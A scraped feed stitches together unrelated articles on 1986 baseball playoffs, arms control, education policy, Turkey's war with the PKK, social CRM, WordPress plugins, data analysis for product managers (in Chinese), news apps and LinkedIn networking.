In truth, though, it is difficult to imagine anything more pulsating than Games 4 and 5 of the American League playoffs in Anaheim over the weekend.

Trailing two games to one, the Red Sox brought 24-game winner Roger Clemens back with three days' rest in a bid to even the count. The ace right-hander appeared in command, too, entering the ninth inning with a 3-0 lead. California still had three outs to go, however, and as we are finding out repeatedly in these series, those last three are often the hardest ones to get.

A homer by Doug DeCinces and singles by Bob Boone and Dick Schofield finished Clemens, and a double by Gary Pettis on a misjudged fly ball made it 3-2 with runners on second and third. It came down to a two-out, bases-loaded situation, and reliever Calvin Schiraldi was one strike away from saving the game. But he hit Brian Downing with a pitch to force in the tying run, and the Angels went on to win in the 11th on a run-scoring single by another of their long-term veterans, Bobby Grich.

But this was just the warm-up act for Game 5! Now leading three games to one, the Angels went with their own ace, Mike Witt, and he entered the ninth inning with a 5-2 lead. A two-run homer by Don Baylor made things interesting, but with two out and nobody on base, Boston was down to its very last chance for 1986.

Rich Gedman (3 for 3, including a homer and a double) was up, so California manager Gene Mauch brought in southpaw Gary Lucas to face the left-handed hitting catcher. But Lucas threw only one pitch, hitting Gedman, and the tying run was on base. Now Mauch switched to right-hander Donnie Moore, and when the count to Dave Henderson went to 1-2, the Angels were one strike away from the World Series. The crowd of 64,223 in Anaheim was going berserk, the wild celebration of the team's first pennant just an instant away, when Henderson smashed a long drive into the left-field stands.

Ironically, Henderson was only in the game because starter Tony Armas had been injured. And three innings earlier Dave had just missed a spectacular catch, only to have Grich's long drive glance off his glove into the stands for a two-run homer. It wasn't really a ``goat-to-hero'' sort of thing, for Henderson had made a great effort on the ball and couldn't be blamed for not holding it, but still it added to the drama of the whole setting.

The Boston ninth wasn't the ball game, though. After all, California had the bottom of the order coming up -- which in this series means its most dangerous hitters! Indeed, the most amazing thing about the first five games has been the production of these supposedly less dangerous Angels. Boone, a top catcher but a .222 hitter during the season, is leading all regulars on both teams with a .529 average. Schofield, known mainly for his play at shortstop, has seven hits including a tiebreaking homer in Game 3. And speedster Pettis, a fine outfielder but an ordinary hitter with little power (five home runs all year), is batting .429 and smashed the two-run homer that pretty much wrapped up that 5-3 third-game win.

And sure enough, some of these lesser lights did it again. A single by Boone, a sacrifice, and a single by equally unsung Rob Wilfong tied the score. Another single by Schofield and an intentional walk loaded the bases with one out and DeCinces coming up. Again the Angels could almost taste the pennant. Even a long fly ball would do it. But reliever Steve Crawford got him on a fly too short to score the run, induced Grich to hit back to the box, and escaped further damage.

So it was extra innings for the second straight game -- and this time the Red Sox won out, with Henderson again the hero via a sacrifice fly.

California still leads 3-2, and has outhit and outslugged the supposedly more muscular Red Sox. But after pulling this one out, Boston could be hard to stop -- especially with the action returning to Fenway Park.

All the heroics weren't in Anaheim, however, for a continent away in New York there were also some dramatic moments. Trailing 4-0, the Mets struck back to tie Game 3 in the sixth, mostly via Darryl Strawberry's three-run homer. They fell behind again 5-4, then won it when Len Dykstra hit a two-run homer in the ninth.

The Astros retaliated the next day, with star right-hander Mike Scott pitching his second masterpiece of the series for a 3-1 victory that evened the count at two games, ensuring that whatever happened in Monday's Game 5 at Shea Stadium, the series would indeed return to the Astrodome for its conclusion later this week.

Become a part of the Monitor community


          Nitze to fore: Round 2         

ARMS control ace Paul H. Nitze has stepped forward from the crowd of American negotiators heading to Geneva for the Jan. 7 talks between Secretary of State George Shultz and Soviet Foreign Minister Andrei Gromyko.

Mr. Nitze is regarded as the ablest man in the field today. His guidance would have been crucial anyway. But President Reagan's appointing him to the prominent role of Shultz adviser does at least three things. It sends another signal that the United States is serious about resuming talks, which are stalled on three fronts - mid-range missiles in Europe, long-range strategic missiles, and space weapons and defense systems. It helps resolve the question of leadership within the US delegation, which will itself be a composite of disputants from the administration's own internal arms control debate. And it prepares the way for someone to head the potential ''umbrella talks'' Mr. Shultz favors.

It was Mr. Nitze in 1982 who, during a walk in the woods near Geneva with his Soviet counterpart, worked out a compromise proposal for the medium missiles in Europe, calling for a limit of 75 missiles for each side - a proposal later disowned by their superiors. Some analysts think the walk-in-the-woods proposal could be part of an arms control solution.

Here is some of the thinking of Mr. Nitze on living with the Soviets, in the new issue of Foreign Affairs:

''Much of our experience in negotiating with the Soviet Union has been on arms control. Arms control is not an end in itself, but a means. The object of arms control negotiations is to support foreign policy and security policy by negotiating agreements that will contribute to reducing the risk of war, primarily the risk of nuclear war. Many other purposes are discussed in the immense literature that now threatens to engulf the subject of arms control and make it incomprehensible. These other purposes - stopping the arms race, saving money, increasing stability, assuring predictability, providing the foundation for a better East-West relationship - may well be desirable, but they are desirable only if they contribute to the more important goal of reducing the risk of war and strengthening the prospects of peace.

''I am convinced that much of the difficulty that the United States has found in getting along with the Soviet Union stems from the contrasting meaning and connotations of the word 'peace.' It means one thing in the West: internally, a state of domestic order, and externally, equilibrium and an absence of war. The Russian word for peace - mir - means something quite different, however, particularly as used by the Soviets since the October Revolution. . . . The Soviet concept of 'peace' (or mir) has come to mean a continuing struggle, rather than a state of equilibrium. . . . Mir takes as a given that there is a natural and irreconcilable conflict of interest between the socialist and non-socialist worlds. In the long run, international equilibrium cannot be guaranteed in a world of competing social systems.''

In a ''live and let live'' superpower world - the Western mode - arms control could reduce the risk of war. Getting the Soviets to move toward the Western concept of peace, restraining their efforts to encourage anarchism and anti-Americanism, could help both sides. A builddown of the Soviet missile force poised toward the West, for example, would be possible.

Meanwhile, Nitze argues, the United States and the West must build a consensus for a dual policy - on guard against Soviet revolutionary totalitarianism, yet welcoming any Soviet interest in policies for reciprocal action.

It is for this balanced view that Mr. Nitze's prominence on the American team should inspire confidence.

Become a part of the Monitor community


          Dmitry Davydov: Social CRM is dead. Long live SocialCRM 2.0        
a394489e0cb180856d1e9fcb7cbd35c5.png

Have you heard about social CRM lately? Probably not. The reason for that is simple — old social CRM model is dead, especially since the famed ‘LinkedOut’ event. For those not in the know, a bunch of early social CRM systems specialized in harvesting LinkedIn data. LinkedIn decided that this information is far too valuable, that LinkedIn users don’t enjoy being spammed, so they restricted API access to a group of selected CRM systems.

Likewise, all ideas to use other social networks for prospecting, be they Facebook or Twitter or Instagram, have mostly failed as well. And, to be perfectly honest, this outcome could have been easily predicted. After all, social networks have the right and the obligation to protect their users from unsolicited marketing, and protecting personal data is the key to this process.

Another early social CRM promise was data enrichment. CRM veteran Jon Ferrara founded Nimble CRM with this promise. It went something like this. Suppose you have a prospect named Peter. Peter uses social media, like Facebook and Twitter. If we import his recent tweets and Facebook posts to his CRM profile, then our sales person can sell to Peter more efficiently, because they’ll know what’s going on in Peter’s life from his social media activities.

Alas, this promise didn’t pan out either. Seven years later, Nimble, like all other early social CRM tools, is very much a niche player with a very limited audience. Compare this to social media management and social listening tools, like Hootsuite, Buffer or SproutSocial, some of which claim to have more than 10 million users and valuation that exceeds one billion dollars. Ouch!

Does this mean social CRM is dead? Well, yes and no. Yes, because prospecting, social listening and enrichment have demonstrated their practical limits and usefulness over the past 7–10 years. We know what works, what doesn’t work and to what extent. No, because social network potential is far beyond simple prospecting and data enrichment tools.

More...
          Red, White & Green         

PRESIDENT Bush's new education plan, "America 2000," is bringing the federal government around to the role it does best. By using a small amount of money in the key leverage points, it can encourage and stimulate a great deal of state and local district action. But not everyone is encouraged by the new plan. Some describe it as a bugle call from the White House, with the "feds" coming again to save American education. They point out that the states and local governments are already rescuing United States schools by paying over 90 percent of the bill and that since 1983, states, on their own, introduced more reforms than education has seen in 100 years. Others note that in the decade of the 1980s, states increased funding for education by more than 30 percent w h

ile the federal government reduced its share of the contributions.

But therein lies the nub of the problem. After all of this effort, student achievement and other indicators such as dropout rates have shown little sign of improvement. Thus, says Mr. Bush in "America 2000," an education improvement strategy is needed that focuses on national education goals that set standards, that provides flexibility in exchange for more accountability, and in general "pushes and prods" the nation's 110,000 public and private schools into improvement.

Creating a more productive education system is both the nation's responsibility and the nation's gain. While states and local communities carry a major portion of this burden, most educators and state policymakers welcome a more active federal partner.

But as in all cooperative endeavors in business and government, the newest and most junior partner needs to pull its chair up to the discussion table carefully. Respect for what has been tried and what's in process is paramount. In more than half the states, legislatures and governors have passed mega-reform laws. Some of these have been in operation for nearly a decade.

While reform efforts to date have not produced the desired results, assuming that nothing is happening in the states, or assuming that a handful of federal bureaucrats can write a plan in 60 days with little input from the people it's designed to help, is setting us all up for a new round of "Hi, I'm from the federal government jokes.

There is also a concern that some of the federal education-reform designers want to use a choice/voucher system to direct federal money to private and parochial schools. The goals are enrollment freedom for parents and competition for the monopoly held by the public schools.

The American education system, however, has been built on the principle of separation of church and state. Breaking this tradition could turn the control of education into a court litigation nightmare and further detract from the reforms that are really needed.

More thought and discussion are needed to bring the federal plans in tune with state reality. Governors are key to the process, but former state governors may also be an untapped resource. The Education Commission of the States, the National Governors' Association, and US Sen. Terry Sanford (D) of North Carolina, a former governor of that state, suggest bringing these individuals together in an ongoing series of small seminars designed to further a mutual understanding of federal and state education nee d

s.

These seminars will involve several sitting governors with several former governors now serving in the US Senate. Each seminar will probe an education issue in depth. At the table will be another former governor, Lamar Alexander, the secretary of education.

At the first of these seminars, Gov. Roy Romer (D) of Colorado pointed out that the No. 1 problem facing this country is education. He then said that our priorities were off because this country was directing the narrowest of resources (the local property tax) to solve the problem.

It is clear that the federal government will have to play a stronger role in reforming education. Maybe the emphasis that was put on math, science, and foreign language instruction following the launch of Sputnik is a federal model that needs to be revisited. The National Defense Education Act mixed federal money with state and local resources and in short order had a visible influence at the classroom level.

The states have assumed a stronger education presence in the last decade. It may be time for a new federal-state-local partnership. Bush's "America 2000" plan could be a step in that direction, but it has to be a step in the same direction the states are going.

Become a part of the Monitor community


          The State of Linkedin -        
A great infographic about LinkedIn - the most popular professional social network launched 7 years ago.

32 Vote(s)
          Best Free Social Media WordPress Plugin        
Today WordPress is often given a slight edge over Blogspot because of its plugins available easily and of wide variety. And now a days it is very important to socialize your blog/website in order to get good impressions. Although it is true that the content of the website is the real hero always but tagging your website at different places is worth doing.
Today, I want to show you top high-quality top free floating social media WordPress network plugins.With this plugins, you can make page floating social share buttons left bar or right bar of your site.So, you can add custom jQuery social share buttons to WordPress in a stylish floating panel, toolbar or display inline. Adds buttons via jQuery for faster page loading. This plugins supported Twitter, Facebook Like, Google +1, LinkedIn, Digg, Pinterest, Stumbleupon, Buffer and much more social networks. Also these plugins comes with unique overviews like; you can display buttons in a floating panel or create a social share toolbar, limitless button sizes vertical box with count, horizontal button with count and horizontal button no count.

1.Digg Digg

2.WPSocializer

3.Floating Social Bar

4.Po.st

5.Floating Social media Links

6.Sharexy

7.CoverShare

8. WordPress Social Share Buttons


These are some best plugins for WordPress that will help to socialize your blog/website. Always remember that a pro blogger must reach out to their audience to tell people what they know better than the others. I hope these plugins will help you to reach out for your mass audience.
You can leave your views and querries in comments.
For Skimlinks http://test.skimlinks.com

          äº§å“ç»ç†å¿…会的10种数据分析方法        

产品经理必会的10种数据分析方法

作者 | 陈明

随着人口和流量红利的下降,互联网行业必然会朝着精益化运营的方向发展。数据分析在很多互联网人的工作中越发显得重要,而对于产品经理来说,更是如此。本文将为产品经理介绍数据分析的基本思路,并基于此,衍生出 2 个常见方法和 7 个应用手段,希望在数据分析的实际应用中能给大家带来帮助。

一、数据分析的基本思路

数据分析应该以业务场景为起始思考点,以业务决策作为终点。基本思路为 5 步,首先要挖掘业务含义、制定分析计划、从分析计划中拆分出需要的数据、再根据数据分析的手段提炼业务洞察,最终产出商业决策。


产品经理必会的10种数据分析方法

接下来我们用一个案例来具体说明这 5 步思路:某国内 P2P 借贷类网站,市场部在百度和 hao123 上都有持续的广告投放,吸引网页端流量;最近内部同事建议尝试投放 Google 的 SEM;另外,也需要评估是否加入金山网络联盟进行深度广告投放。在这种多渠道的投放场景下,产品经理该如何进行深度决策?

1. 挖掘业务含义

首先要了解市场部想优化什么,并以此为核心的 KPI 去衡量。渠道效果的评估,最重要的是业务转化:对 P2P 类网站来说,是否『发起借贷』远远比『用户数量』重要。

所以无论是 Google 还是金山渠道,都要根据用户群体的不同,优化相应用户的落地页,提升转化。

2. 制定分析计划

以『发起借贷』为核心转化点,分配一定的预算进行流量测试,观察对比注册数量及 ROI 效果,可以持续观察这部分用户的后续价值。

3. 拆分查询数据

根据各个渠道追踪流量、落地页停留时间、落地页跳出率、网站访问深度以及订单类型数据,进行用户分群。

4. 提炼业务洞察

在不同渠道进行投放时,要根据 KPI 的变化,推测业务含义。比如谷歌渠道的效果不好,可能因为谷歌大部分的流量在海外,可能会造成转化率低。而金山网络联盟有很多展示位置,要持续监测不同位置的效果,做出最后判断。

5. 产出商业决策

最后根据数据洞察,指导渠道的投放决策制。比如停止谷歌渠道的投放,继续跟进金山网络联盟进行评估,而落地页要根据数据指标持续地进行优化。

二、常见的数据分析方法

(一)内外因素分解法

内外因素分解法是把问题拆成四部分,包括内部因素、外部因素、可控和不可控,然后再一步步解决每一个问题。


产品经理必会的10种数据分析方法

社交招聘类网站,一般分为求职者端和企业端,向企业端收费方式之一是购买职位的广告位。业务端人员发现『发布职位』数量在过去的 6 个月里有缓慢下降的趋势。对于这类某一数据下降的问题,从产品经理的角度来说,可以如何拆解?根据内外因素分解法分析如下:

1. 内部可控因素

产品近期上线更新、市场投放渠道变化、产品粘性、新老用户留存问题、核心目标的转化;

2. 外部可控因素

市场竞争对手近期行为、用户使用习惯的变化、招聘需求随时间的变化;

3. 内部不可控因素

产品策略(移动端/PC端)、公司整体战略、公司客户群定位(比如只做医疗行业招聘);

4. 外部不可控因素

互联网招聘行业趋势、整体经济形势、季节性变化;

(二)DOSS

DOSS 是从一个具体问题拆分到整体影响,从单一的解决方案找到一个规模化解决方案的方式。


产品经理必会的10种数据分析方法

某在线教育平台,提供免费课程视频,同时售卖付费会员,为付费会员提供更多高阶课程内容。如果我想将一套计算机技术的付费课程,推送给一群持续在看 C++ 免费课程的用户,产品经理应该如何辅助分析?

按 DOSS 的思路分解如下:

1. 具体问题

预测是否有可能帮助某一群组客户购买课程。

2. 整体

首先根据这类人群的免费课程的使用情况进行数据分析,之后进行延伸,比如对整体的影响,除了计算机类,对其他类型的课程都进行关注。

3. 单一回答

针对该群用户进行建模,监控该模型对于最终转化的影响。

4. 规模化

之后推出规模化的解决方案,对符合某种行为轨迹和特征的行为进行建模,将课程推荐模型加入到产品设计中。

三、数据分析的应用手段

根据基本分析思路,常见的有 7 种数据分析的手段。

(一)画像分群

画像分群是聚合符合某中特定行为的用户,进行特定的优化和分析。


产品经理必会的10种数据分析方法

比如在考虑注册转化率的时候,需要区分移动端和 Web 端,以及美国用户和中国用户等不同场景。这样可以在渠道策略和运营策略上,有针对性地进行优化。

(二)趋势维度


产品经理必会的10种数据分析方法

建立趋势图表可以迅速了解市场, 用户或产品特征的基本表现,便于进行迅速迭代;还可以把指标根据不同维度进行切分,定位优化点,有助于决策的实时性;

(三)漏斗洞察

通过漏斗分析可以从先到后的顺序还原某一用户的路径,分析每一个转化节点的转化数据;


产品经理必会的10种数据分析方法

所有互联网产品、数据分析都离不开漏斗,无论是注册转化漏斗,还是电商下单的漏斗,需要关注的有两点。第一是关注哪一步流失最多,第二是关注流失的人都有哪些行为。关注注册流程的每一个步骤,可以有效定位高损耗节点。

(四)行为轨迹


产品经理必会的10种数据分析方法

行为轨迹是进行全量用户行为的还原。只看 PV、UV 这类数据,无法全面理解用户如何使用你的产品。了解用户的行为轨迹,有助于运营团队关注具体的用户体验,发现具体问题,根据用户使用习惯设计产品,投放内容;

(五)留存分析

留存是了解行为或行为组与回访之间的关联,留存老用户的成本要远远低于获取新用户,所以分析中的留存是非常重要的指标之一;


产品经理必会的10种数据分析方法

除了需要关注整体用户的留存情况之外,市场团队可以关注各个渠道获取用户的留存度,或各类内容吸引来的注册用户回访率,产品团队关注每一个新功能对于用户的回访的影响等。

(六)A/B 测试

A/B 测试是对比不同产品设计/算法对结果的影响。


产品经理必会的10种数据分析方法

产品在上线过程中经常会使用 A/B 测试来测试产品效果,市场可以通过 A/B 测试来完成不同创意的测试。要进行 A/B 测试有两个必备因素:

有足够的时间进行测试; 数据量和数据密度较高;

因为当产品流量不够大的时候,做 A/B 测试得到统计结果是很难的。而像 LinkedIn 这样体量的公司,每天可以同时进行上千个 A/B 测试。所以 A/B 测试往往公司数据规模较大时使用会更加精准,更快得到统计的结果。

(七)优化建模

当一个商业目标与多种行为、画像等信息有关联性时,我们通常会使用数据挖掘的手段进行建模,预测该商业结果的产生;


产品经理必会的10种数据分析方法

例如:作为一家 SaaS 企业,当我们需要预测判断客户的付费意愿时,可以通过用户的行为数据,公司信息,用户画像等数据建立付费温度模型。用更科学的方式进行一些组合和权重,得知用户满足哪些行为之后,付费的可能性会更高。以上这几种数据分析的方法论,仅仅掌握单纯的理论是不行的。产品经理们需要将这些方法论应用到日常的数据分析工作中,融会贯通。同时学会使用优秀的数据分析工具,可以事半功倍,更好的利用数据,实现整体增长。

End.

转载请注明来自36大数据(36dsj.com):36大数据 产品经理必会的10种数据分析方法


          With Rebels on Run, Turkey Gets Tougher         

Turkey seems to have won the upper hand in its long and costly war against a Kurd separatist movement. And amid new military gains against the rebel group PKK, or Kurdish Workers Party, Turkey's position has only hardened.

The prospect of a negotiated settlement with the group, which seeks a homeland for the region's ethnic Kurds, including 12 million in Turkey, appears to have faded.

Turkey is a key NATO ally that has increasingly sought to cement its special relationship with the United States, particularly since being snubbed earlier this year for membership in the European Union. The EU cited human rights concerns - including questions about Turkey's treatment of Kurds - as a reason it was not admitted.

The recent capture of a top PKK commander, Semdin Sakik, came amid an offensive in which Turkey's Army also claims to have killed scores of rebels in Turkey's southeast.

'Brink of collapse'

"The PKK has received a severe blow and is on the brink of total collapse," said a senior member of the Army's general staff April 17, speaking on condition of anonymity. "Now it is up to the government and other civilian organizations to resolve the region's economic and social problems, which are the real cause of the violence," he said.

Another military source, asked whether the "defeat" of the PKK might encourage Turkish authorities to listen to recent PKK overtures for a settlement, was blunt: "No one in Turkey would agree to negotiate with terrorists," he said. "We have always resisted any contacts with the PKK, and now that they are crumbling, there cannot be any question of ... acceptance of their conditions."

A call has gone up among liberal Turks, however, to go beyond economic and social reform in the region. There is debate over allowing Kurds to use their language in education, broadcasting, and official contacts.

"If we want this [military success] to be permanent, we have to deal urgently with other aspects of the problem," wrote Hasan Cemal, a prominent columnist for the daily newspaper Sabah, on April 17. "To secure economic well-being in the southeast is only one aspect; the other is to respect [Kurdish] identity and their rights to use their culture and language," he wrote.

Army and government still at odds

Tensions remain high between the Army, which regards itself as guardian of the secular state founded by Mustafa Kemal Ataturk more than 70 years ago, and the civilian government. Prime Minister Mesut Yilmaz was not told about the raid to capture Mr. Sakik until the operation was over.

At the time the raid was being undertaken, PKK chief Abdullah Ocalan was making an appeal to both Mr. Yilmaz and to Gen I. H. Karadayi, the Army chief of staff. Mr. Ocalan proposed a cease-fire followed by a dialogue, and stressed that he was not trying to establish an independent Kurdish state, which had previously been stated as the PKK's aim.

In a statement broadcast April 17 by a London-based Kurdish TV station, Ocalan pointed to the "Northern Ireland formula" as an example for Turkey. "I'm prepared to leave the arms and enable [talks]," he said.

But one senior government official says Ocalan is simply trying a new tactic. He says Turkey's "southeast problem" - officials still refuse to refer to it as a "Kurdish problem" - has no resemblance to the situation in Northern Ireland.

Public opinion, beyond that of the liberal elite, seems to favor a hard line. Many Turks blame the PKK for 14 years of terrorism, the deaths of 30,000 people, and a cost to Turkey of $80 billion. Many have rallied for the execution of Sakik, who is likely to be tried for several guerrilla attacks, including one that killed 33 Turkish soldiers in 1993.

Become a part of the Monitor community


          Find the best personalized news app for your iPhone and iPad - Macworld        

Many apps give the news a personal touch—but which one should you download?

When Flipboard () hit the App Store last year, the personalized news app for the iPad turned out to be a revelation. There were already plenty of Twitter clients, Facebook apps, and RSS readers available for download—there were even apps that combined those streams of information into one. But none did it quite so elegantly, creating the sensation of effortlessly flipping through the magazine. Overnight, Flipboard reinvented the category.

A year later, Flipboard is still the class of "personalized news" apps—those offerings that take links from the user's selected social networks and news sources to provide a one-stop-shop of news aggregation. (These apps are different from news discovery apps like Zite, which use your preferences to seek out information from new and unexpected sources.) Because you can view the information sources anywhere, presentation is what really matters when it comes to these personalized news apps.

Flipboard has maintained its lead by never standing still—continually adding new features, including social networks like LinkedIn and Instagram, and working with publishers to craft optimized pages for their content. Other apps in this category can often do a fine job, but maybe miss an element or two that make Flipboard so appealing.

Take Pulp () for example. This $ 5 app from Acrylic Software doesn't try to compete with Flipboard's magazine style, instead turning its users into newspaper designers. You select the news feeds you want to read, then choose the layout. One, two, or three columns per page? Do you want a simple list of headlines from a news source, or a summary of each story? Pulp is so endlessly customizable, that it might actually be your fault if you don't like it, with one possible exception: There's no way to import your Facebook and Twitter feeds. If you're looking to combine all your information sources into one app, you'll have to look elsewhere.

You might try Taptu (). In many ways, this free offering is indistinguishable from Alphonso Labs' Pulse News (), which which recently won an Apple Design Award at June's Worldwide Developers Conference. Taptu is unlikely to win a design award—its homepage is too crammed with information, too claustrophobic: I counted 56 separate visual elements on the page when I used the app.

Luckily, Taptu's homepage is not your landing spot, it's your entry point. Click on any line—your Facebook or Twitter feed, or any one of a range of news and blog sources that you choose and organize—and you're given a single story to view. You can flip through the stories by swiping the page. It's not quite as leisurely as Flipboard—you can power through your feeds fairly quickly in this fashion—but it's not quite the explosion of information you first encounter, either.

Taptu offers some degree of customization. Once you import feeds, you can organize them into categories by dragging feeds on top of one another to create what Taptu calls a mixed stream. You can then rename the stream—"Sports Sources," say—and add a splash of color to make it easier to spot at a glance. Still, I think that if you want to follow a lot of information sources, Taptu can be unwieldy.

Whatever their drawbacks, though, the preceding apps beat the pants off two new offerings from "old media" companies—Trove (), from the Washington Post, and News.Me(), from the New York Times (via Bit.ly). These newspapers take social networking and news aggregation and make those concepts boring and clunky.

News.Me takes the links posted by the friends in your Twitter feed—no other social networking service has input—and displays it in a more attractive summary form. The user interface is attractive and easy to use: You can use your thumb and forefinger to stretch a story in the list, seeing more of it, or you can tap to see the entire story in a clean, readable, ad-free format.

But News.Me doesn't give you access to your Twitter lists. And unlike Flipboard, it doesn't let you add additional feeds within the app. If you like @BreakingNews but don't want it cluttering your main Twitter feed, you're out of luck: there's no way to access it from News.Me. The limitations become irritating, though, because you have to pay for them: $ 1 a week or $ 35 a year. It's not worth it.

Trove is a little better. Instead of Twitter, Facebook is the foundation, taking your "likes" and creating news feeds about those topics. The problem is design: Click on a story in Trove, and you're automatically whisked to an in-app browser to read. That's not awful, but services like Readability and apps like Flipboard, Zite, and even News.Me have trained me to expect a more visually consistent reading experience. The bigger problem on iPad is Trove's unending grid of equally weighted stories—it's easy for the eyes to get lost.

That's not a problem with Editions by AOL (), a recent entrant into the category of news-gathering apps. It features an elegant, Flipboard-style layout that's easy to view. The app offers a bit of a twist, asking for access to your AOL/AIM account—in addition to Facebook and Twitter—to shape the news it offers you. Once you've done that, you can further customize what kind of news you'd like to see, and what sources are included in the roundup.

One thing that Editions does differently from its competitors: It only "publishes" the news once a day—offering itself not as a 24-7 aggregator, but instead as more customizable version of News Corp.'s The Daily. (The difference being, of course, that The Daily features only its own originally-produced content.) If you're a news junkie who requires a constant stream of headlines, you'll want to skip this app.

Except for Flipboard, Editions by AOL, and Pulp, each of the preceding apps works on the iPhone and iPod (top 100 apps for ipod touch) touch, either as a universal offering or a separate app. One of the chief charms of Smartr ()—a free offering from Factyle—is its focus on the old-fashioned iPhone. Smartr takes the links your friends post to Twitter and Facebook, and converts them into an attractive summary list of news stories and blog posts optimized for the iPhone. One minor complaint: the Twitter and Facebook streams must be viewed separately. Apps like SocialPhone show that those feeds can be combined; it would be nice to have the option here.

But if you're sticking with the iPad, Flipboard probably remains your best bet. It has the best design, the most intuitive interface, the unmatched integration with the most social networks. Flipboard's competitors are catching up—but they still have a ways to go.

[Joel Mathis is a freelance journalist and political columnist for Scripps Howard News Service. He lives in Philadelphia.]

top app ipod – Google News


          Fired Google engineer who wrote the anti-diversity manifesto appears to have removed a Ph.D. program from his LinkedIn page        

Fired Google engineer who wrote the anti-diversity manifesto appears to have removed a Ph.D. program from his LinkedIn pageJames Damore, the Google engineer who was fired after writing the now infamous memo about the...



          LinkedIn Joins CSU, Other Key Northeast Ohio Stakeholders to Analyze Vital Health IT Talent Data        
Project is a tactic within HIT in the CLE Regional Talent Initiative

*Release via the BioEnterprise

LinkedIn, which operates the world’s largest professional network on the Internet with more than 500 million members in over 200 countries and territories, has teamed up with BioEnterprise, the City of Cleveland, Cleveland State University and Cuyahoga County to provide data, analysis, and market research on the talent flows of software developers, data scientists, data analysts and other computer science positions within the Northeast Ohio health IT sector. Supported by the Cleveland Foundation, the analysis will ultimately inform policy, educational curriculum, community programming and other talent alignment strategies within this regional growth sector.

The bioscience cluster is a primary growth engine reviving the Northeast Ohio economy. Within the bioscience cluster, the health IT industry is flourishing, creating hundreds of new jobs each year. However, an acute shortage of qualified local talent is a major barrier to growth.

“One of the critical limiting factors to growth in Northeast Ohio’s bioscience industry today is the availability of health IT talent,” explained Aram Nerpouni, BioEnterprise President and CEO. “Thriving health IT companies are hindered by the dearth of software developers and data scientists. The LinkedIn project should provide meaningful data and analysis to inform how we address this challenge.”

With the support of the Cleveland Foundation, BioEnterprise launched HIT in the CLE in 2015 to address the regional computer science and data science talent gap. The Initiative aims to grow and diversify the Northeast Ohio health IT talent pipeline to support a vibrant health IT industry.

“We felt it was crucial to partner with BioEnterprise to begin addressing the demand-supply gap in health IT and to deeply engage businesses to expand the talent pipeline,” said Shilpa Kedar, Cleveland Foundation Program Director for Economic Development. “LinkedIn’s involvement with HIT in the CLE is a tremendous win for the region and we anticipate that this work will prove to be extraordinarily beneficial.”

The LinkedIn project is an important tactic within the larger HIT in the CLE talent strategy. The effort aspires to provide insights into the education and experience of people currently employed in the regional health IT sector, pathways for securing regional health IT positions, and institutions from which the local sector most successfully attracts qualified talent. The insights discovered through the analysis may surface gaps and barriers in the local health IT talent pipeline and help inform strategy for addressing these important talent issues.

“At LinkedIn, our vision is to create economic opportunity for every worker,” said LinkedIn U.S. Head of Policy Nicole Isaac. “We’re excited to use the Economic Graph – a digital map of the global economy that when complete will include every member of the global workforce and their skills, all open jobs, all employers, and all educational institutions – to provide the City of Cleveland with a more holistic view of the computer science and data science skills local employers need, the skills its workers have and the disconnect between the two. The City can use those insights to create a stronger IT talent pipeline, and grow its IT industry.”

“Making our workforce a competitive advantage, which includes understanding our gaps as well as opportunities is a crucial strategic focus,” said Cuyahoga County Executive Armond Budish. “We know that the strength of our healthcare is a great advantage and we believe that the bioscience cluster will drive a lot of our job growth in the coming years. LinkedIn’s contribution to help inform and accelerate that growth is a welcome addition to the HIT in the CLE effort.”

Data provided by BioEnterprise and LinkedIn will be pulled throughout the summer. Ongoing analysis will take place through the summer and findings are expected in the fall.

“Cleveland is a City with a growing health research and information technology economy from the unseen power of the 100 gig fiber network along the Health-Tech Corridor and the health care research institutions within our community,” said Mayor Frank G. Jackson. “I welcome the opportunity for the City of Cleveland to collaborate with LinkedIn to provide research and data on the talent that is relocating to Cleveland and drawing talent to join the workforce here.”


          Comment on Starting a Startup: Polytopix by Prem Boinpally        
hey Shiva - Not sure if you already move to Bay area. This is Prem Boinpally - IIT KGP '99. did send an invite on linkedin as well. Was looking to connect with you on some of the entrepreneurial stuff I have been working on. It will be great if we can connect - boinpally.prem@gmail.com best,Prem
          Should You Accept That LinkedIn Connection Request?        

Bruce Lee:

In most social networks, connecting with someone else can feel like a personal decision.  After all, if you accept a friend request in Facebook, you’ve just given access to all of your “private” images and updates.  They’ll see that embarrassing photo of you at the beach.  {GASP!}  This has trained us to be weary of who we allow to be “connected” with us online.  So much so that some people have private Twitter accounts.  (Something that I have yet to understand.)

Six Degrees of Separation

The way LinkedIn was created was based upon the six degrees of separation, the theory that everything is somehow 6 steps or less connected to other things.  Do you remember the Six Degrees of Kevin Bacon game that people once played?  LinkedIn takes advantage of that theory, by connecting professionals that otherwise might not be able to be connected, for the end goal of exposing new opportunities to each other.  They even display it to you when looking at other peoples profiles.  For example, it was interesting to see just how close I am to knowing CEO’s of major companies, like Facebook, Yahoo, and Microsoft.

I'm only 1-2 degrees away from being connected to some well-known CEO's

What if I had an amazingly ground-breaking idea or opportunity for one of them, or vice-versa?  LinkedIn makes it possible to do what wasn’t imaginable 15-20 years ago.  We can find each other through mutual connections.  For example, I can ask Mike Earhart to help get me a meeting with Mark Zuckerberg.  Without these connections, I wouldn’t know how to even begin such a task, much less the right person to contact to make it happen.

In a real world application of this idea, your opportunities probably won’t involve Facebook or Microsoft – but the principle is the same.  You might be looking for that next opportunity, or it might be looking for you. 

Now How About That LinkedIn Connection Request?

In general, I’d tell you to accept pretty much every single LinkedIn request you get.  This is pretty much the rule I live by myself.  The only connections I turn down are the few that look obviously spammy.  You should also never be afraid to ask for a LinkedIn connection, and never turn down an inbound connection request. 

You simply never know how that connection might turn into something unexpectedly amazing – like your next job, the co-founder of your next startup, your foot in the door at the next client, or your savior when you need some critical information during your next project.  They might even be the key to you getting introduced to a high-powered CEO. 

If you’re using LinkedIn correctly, these same connections could also amplify your reach to other people when they like, comment on, or share your updates.

Oh, and by the way… there’s no harm to accepting anyone’s request.  If they become annoying or are spammers, LinkedIn makes it easy for you to block or remove them.

Wait a Second, What About the Spammers?

Out of all of the major social networks, LinkedIn appears to have the least spammers as far as I can tell.  At least, I don’t run into them a whole lot.  For the most part, the profiles appear to be real people.  Now, some of them are simply there to generate more sales for their business, but they’re real people, with a real profile, and other real profiles connected to them.


          Know Your ABB’s: Always Be Branding!        

A filtered view of yourself

